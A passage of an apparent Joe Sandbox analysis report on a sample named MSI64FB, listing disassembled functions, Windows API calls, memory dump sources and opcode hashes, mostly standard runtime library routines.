                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 73155330-0
                                                                                                                                                                                                                                                    • Opcode ID: a085e3e58b56e6e7bc15dfcd1afdafbfe9d13c5a3161bd299f3db009eb6b914b
                                                                                                                                                                                                                                                    • Instruction ID: 0f9ce167c24581e1ddeb1e5b86c66875b41fbf81e475935d400073fb03b7239c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a085e3e58b56e6e7bc15dfcd1afdafbfe9d13c5a3161bd299f3db009eb6b914b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BB1BFA2B08A4595EB14FF16E5002BDA361EB15BE4F948731EA3D03BEADF7CD5528310
                                                                                                                                                                                                                                                    Function 00007FF749F9B6E0 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF749F9B6CB), ref: 00007FF749F9B7FE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleMode
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4145635619-0
                                                                                                                                                                                                                                                    • Opcode ID: ccca98ebb091c9da7ec789f755d8c99d2df8471d8a47f9d6018264015d811d81
                                                                                                                                                                                                                                                    • Instruction ID: 6652d87eaf55c3e57539738bedf0a398e9606d37118969119be0937f5d4be79d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccca98ebb091c9da7ec789f755d8c99d2df8471d8a47f9d6018264015d811d81
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F91A322F2C652C9FB50BF6994406BDA7B0BB4AB89F940136DE0E676D5DE38E445C320
                                                                                                                                                                                                                                                    Function 00007FF749F493D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 134COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                    • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                                                                                                    • API String ID: 1452528299-1781106413
                                                                                                                                                                                                                                                    • Opcode ID: 79a75c3a5b373ac5cbb043d2309fb87b0531bbf019b2df93a7572533a1546614
                                                                                                                                                                                                                                                    • Instruction ID: a0dde02a7221d4bab746deec7f7ab300832628805a9457fb6234a961bc1c1a8c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79a75c3a5b373ac5cbb043d2309fb87b0531bbf019b2df93a7572533a1546614
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE513C5AB98251C1EB11AF21E4103B9B7F4FF64F98FA99031DA49477A4EB3CD481C361
                                                                                                                                                                                                                                                    Function 00007FF749F43B80 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 195334829-0
                                                                                                                                                                                                                                                    • Opcode ID: b7620b575ae9e2195ab6154113197cb97990b0f63de61dd8a8fb38f0283fe627
                                                                                                                                                                                                                                                    • Instruction ID: fc4b7d0a49f00a11cc622f1575df1c850942ff57fe03500b6cdbee4b4cf20d37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7620b575ae9e2195ab6154113197cb97990b0f63de61dd8a8fb38f0283fe627
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E519122A5CB85C2EB14BF29E54467DA3B0FBA4B94F905732EB9C026D5DF7DE5808700
                                                                                                                                                                                                                                                    Function 00007FF749F87568 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 14e28bbd83315e56aa89ba7a815555d4ced952fee517ea659738abf0351f5ce9
                                                                                                                                                                                                                                                    • Instruction ID: 82cfa4b044aeded7f9561fc751af614d349b58e040830bc79a6084db0970b8c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14e28bbd83315e56aa89ba7a815555d4ced952fee517ea659738abf0351f5ce9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC41216290CA85C9EB92FF26C4213B8BBB0AB85F88F998071D68C57385DF3DD445C761
                                                                                                                                                                                                                                                    Function 00007FF749F43AA0 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 195334829-0
                                                                                                                                                                                                                                                    • Opcode ID: 2058b5ff343b4c30444a613e6f738dd4c8883d5a1a72f83e2f17892165ffba93
                                                                                                                                                                                                                                                    • Instruction ID: 456f4225d9f17d5f1fe5a76593214e2d3ae44223e5ee0f782bf72d504b68548a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2058b5ff343b4c30444a613e6f738dd4c8883d5a1a72f83e2f17892165ffba93
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC219061B48A41C4EF08FF69D44836CA2B1EF18B88F940431DA4C06794DFBED8948350
                                                                                                                                                                                                                                                    Function 00007FF749F50920 Relevance: 6.1, APIs: 4, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF749F46936,?,?,00007FF749F46936,00007FF749F50B77), ref: 00007FF749F5098F
                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF749F50A1F
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F50A25
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocConcurrency::cancel_current_taskLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3382108686-0
                                                                                                                                                                                                                                                    • Opcode ID: e21704fab570b5260250c1a7fa2d23a6ee15106822e6810bbdf106a81f463f6b
                                                                                                                                                                                                                                                    • Instruction ID: 3eae199e1869e0bd8293b23ec70d94168d67ddf39259fc57b2ea8ff0a2efafe0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e21704fab570b5260250c1a7fa2d23a6ee15106822e6810bbdf106a81f463f6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8421B461A0DB42D5FB147F51E140379A2B1EB54BE0F984634DBAD067DADE3CE6908310
                                                                                                                                                                                                                                                    Function 00007FF749F42D30 Relevance: 6.1, APIs: 4, Instructions: 66encryptionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free$Local$CertCertificateContext_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 976693150-0
                                                                                                                                                                                                                                                    • Opcode ID: 4d7e5757a4b8fb45d6f1817235b451567160ffc89686e10cb447641be802a98c
                                                                                                                                                                                                                                                    • Instruction ID: b60241803f098bcfddbcf4cfd7c858b535346e819681c475f198ef2c00c64a08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d7e5757a4b8fb45d6f1817235b451567160ffc89686e10cb447641be802a98c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6215122B09B81C5EB49AF69E9443B8A2B0EF58B84F989131CB5D46795DF7CD5E08310
                                                                                                                                                                                                                                                    Function 00007FF749F51AA0 Relevance: 6.1, APIs: 4, Instructions: 54fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3604237281-0
                                                                                                                                                                                                                                                    • Opcode ID: 34d9c14b5ce983523c59f3785cf987cf770a7b7f0dee9d120179aa1804052436
                                                                                                                                                                                                                                                    • Instruction ID: 3553817d2196488528dcf7ebb43b8839b7e380f52d81ef516f3e6529e75701db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34d9c14b5ce983523c59f3785cf987cf770a7b7f0dee9d120179aa1804052436
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8115832B08B51C6E720AF15B80065AB6B5FB85BC8F549225EB8D03B98DF3DD155CB84
                                                                                                                                                                                                                                                    Function 00007FF749F49A30 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 235COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • PathIsUNCW.SHLWAPI(?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,00007FF749F45537), ref: 00007FF749F49AC5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Path
                                                                                                                                                                                                                                                    • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                    • API String ID: 2875597873-3019864461
                                                                                                                                                                                                                                                    • Opcode ID: 8b9ba77d20cf81e293a248a6a1d40c74b6832cf9937af5855fb11453d73f124e
                                                                                                                                                                                                                                                    • Instruction ID: 83fe84871a5077c5ac7dc50d061c82c74c5c6fd46c5300a0e443a44694dcae09
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b9ba77d20cf81e293a248a6a1d40c74b6832cf9937af5855fb11453d73f124e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABA19922F18B42C5FB10EFA0D9406BCA3B0AB64B98F545A35CF5D27AD5DF78A1D18360
                                                                                                                                                                                                                                                    Function 00007FF749F4A7C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00007FF749F4A9A1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                                                                                                                                                                                                                                    • API String ID: 195334829-1713319389
                                                                                                                                                                                                                                                    • Opcode ID: 784c67a23adc57e6e1380ec58592efdc0e24f606274b4b48ba1a93ef3c156208
                                                                                                                                                                                                                                                    • Instruction ID: 76383e697108094083737b7a585585dc7e709a187a8958bd63ce5696668c936d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 784c67a23adc57e6e1380ec58592efdc0e24f606274b4b48ba1a93ef3c156208
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51BC62A0CA81C5EB01BF2AE5401A9B775FB98BD0F984132EB9C07B95DF3CD166C310
                                                                                                                                                                                                                                                    Function 00007FF749F7C008 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 1467352782-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: b61b5b8a262240449e3781586ec27361341d3879283c7cff89dbb56452d7f464
                                                                                                                                                                                                                                                    • Instruction ID: ad24394495ad3ab7723fa70dfe8e8d71dcccb0c76f180d3c041d0a756871aefa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b61b5b8a262240449e3781586ec27361341d3879283c7cff89dbb56452d7f464
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB71EE72A0C681C6DB60BF66948037DBBB0FB05B88F848175EE8C47BC9EA2CD551CB50
                                                                                                                                                                                                                                                    Function 00007FF749F91BC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                    • Opcode ID: 10bec564e25ec30f9018c03ca1fc561d6e050baf150cf86d17da02a2edfcc303
                                                                                                                                                                                                                                                    • Instruction ID: f6f576bd259cc8319759278e5be160d224d5425454c9928af8fa4932231230a7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10bec564e25ec30f9018c03ca1fc561d6e050baf150cf86d17da02a2edfcc303
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B411622B1C382C6FB64BF25E4417BAD671EB82BA4F944235EE5D06AD5EF3CD4418710
                                                                                                                                                                                                                                                    Function 00007FF749F7C6B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2558813199-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 867b516eb8bbdf87a1c2c6b2c9181f8ed7436badd309d8f4accec465851d6def
